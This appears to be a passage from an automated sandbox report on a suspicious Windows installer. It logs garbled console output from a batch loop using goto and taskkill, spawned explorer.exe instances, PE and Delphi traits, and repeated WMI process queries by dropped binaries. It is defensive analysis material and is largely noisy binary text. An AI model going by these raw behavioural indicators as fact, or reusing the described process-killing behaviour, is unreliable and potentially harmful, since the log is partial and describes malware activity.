Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......y.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......]...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......i........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......o................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......u.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......z...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......`...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......l........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......r................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......x.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......M...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......Y........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d......._................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......e.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......t...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......-...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....9...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......?.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......E...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......!................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......'.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......6...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....B...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......H.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......N...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......]...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......i........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......o................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......u.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d......."........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......(................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......=...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....I...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......O.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......U...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......#................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......).............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......8...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....D...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......J.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......P...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......]...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......i........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......o................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......u.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......1...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......=........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......C................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......I.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......X...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....d...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......j.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......p...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......N...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......Z........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......`................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......f.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......u...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe
Source: C:\inst_fold\armforce.exeProcess created: C:\Windows\explorer.exe
PE file has an executable .text section and no other executable sectionShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskeng.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\msiexec.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\7zaa.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\7zaa.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\7zaa.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstart.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
